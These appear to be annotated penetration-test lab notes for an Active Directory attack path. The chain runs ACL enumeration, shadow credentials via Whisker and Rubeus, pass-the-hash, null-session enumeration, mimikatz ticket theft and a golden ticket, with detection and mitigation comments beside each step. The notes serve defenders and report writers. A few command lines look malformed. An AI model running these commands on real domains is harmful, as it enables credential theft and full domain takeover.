# Lab notes for an Active Directory attack path as it appears in pentest /
# red-team reports: ACL enumeration -> shadow credentials -> pass-the-hash,
# plus null-session enumeration, pass-the-ticket and a golden ticket.
# Lines are a mix of PowerShell, bash, rpcclient and mimikatz console input;
# values in <...> are placeholders filled in per engagement.
# The review annotations give the detection / mitigation counterpart of each
# step, i.e. what the remediation section of a report should cover.

# Execution policy is not a security boundary; bypassing it is expected.
# Defenders rely on script block logging (event 4104) and AMSI instead.
powershell -ep bypass # bypass script exec
# Dot-sourcing PowerView loads it into the session; AMSI and module
# logging are the usual detection points here.
. .\PowerView.ps1
# ACL enumeration over LDAP: objects where non-default principals hold
# write-capable rights. Over-permissive ACLs are a misconfiguration; the fix
# is to review and remove them, and to alert on broad LDAP enumeration.
Find-InterestingDomainAcl -ResolveGuids # Privileges enum
# Narrow the output to what a given identity can write to.
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "<user>" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights
# Shadow credentials: requires GenericWrite (or equivalent) on the target
# user object and writes a key credential to its msDS-KeyCredentialLink
# attribute. Mitigation: audit and remove GenericWrite on user objects;
# detection: directory service change auditing (event 5136) on that attribute.
.\Whisker.exe add /target:<user>
# output - Whisker prints the Rubeus command for the new key credential
# Certificate (PKINIT) authentication, then /getcredentials recovers the NTLM
# hash. Detection: TGT requests (event 4768) with certificate information
# populated for an account that normally authenticates with a password.
# NOTE(review): `/user:<user` is missing its closing `>` placeholder.
.\Rubeus.exe asktgt /user:<user /certificate:<cert> /password:"<pass>" /domain:<domain> /dc:<dc> /getcredentials /show
# output - NTLM hash
# Pass-the-hash over WinRM. Detection: network logons (event 4624, type 3)
# using NTLM from unexpected source hosts; mitigation: Protected Users /
# NTLM restrictions and limiting WinRM to dedicated admin hosts.
evil-winrm -i <IPv> -u <user> -H <NTLM-hash>
# Null session: empty username (-U "") and no password prompt (-N).
# Mitigation: RestrictAnonymous / RestrictAnonymousSAM hardening on DCs.
rpcclient -U "" <IP> -N # null session: empty username, no password prompt
# rpcclient console input: list domain users and groups.
enumdomusers
enumdomgroups
# mimikatz console input from here. privilege::debug needs SeDebugPrivilege
# (local admin); LSASS memory access is the detection hook (Sysmon event 10
# with LSASS as the target); Credential Guard / LSA protection mitigate it.
privilege::debug
# Export the Kerberos tickets held in memory to files.
sekurlsa::tickets /export
# Pass-the-ticket: inject an exported ticket into the current session.
kerberos::ptt <ticket>
# exit mimikatz, then from the Windows shell:
klist # check that the injected ticket is visible to the session
# Golden ticket: needs the krbtgt key, here apparently pulled from a DC's LSA.
# Mitigation: rotate the krbtgt password twice (allowing replication between
# the two changes) after any DC compromise; detection: TGS requests (event
# 4769) whose TGT has an unusual lifetime, a non-existent user, or RID 500
# being used from a non-admin host.
privilege::debug
sadump::lsa /inject /<user>:krbtgt
Kerberos::golden /user:<Administrator> /domain:<domain-name> /sid:<domain-sid> /krbtgt:<NTLM hash> /id:500
# Open a command prompt in the context that now holds the golden ticket.
misc::cmd